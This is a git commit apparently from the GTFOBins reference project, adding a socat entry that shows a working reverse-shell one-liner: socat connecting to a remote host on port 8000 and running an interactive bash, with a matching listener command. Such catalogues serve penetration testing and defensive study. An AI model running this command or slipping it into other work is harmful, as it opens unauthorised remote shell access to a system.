Add socat

This commit is contained in:
Emilio Pinna 2018-05-22 21:40:27 +01:00
parent 1866834c6a
commit 43b68e46b1

9
_gtfobins/socat.md Normal file
View File

@ -0,0 +1,9 @@
---
functions:
reverse-shell:
- description: Run <code>socat file:`tty`,raw,echo=0 tcp-listen:8000</code> to receive the shell on the other end.
code: |
RHOST=10.0.0.1
RPORT=8000
socat tcp-connect:$RHOST:$RPORT exec:"bash -li",pty,stderr,setsid,sigint,sane
---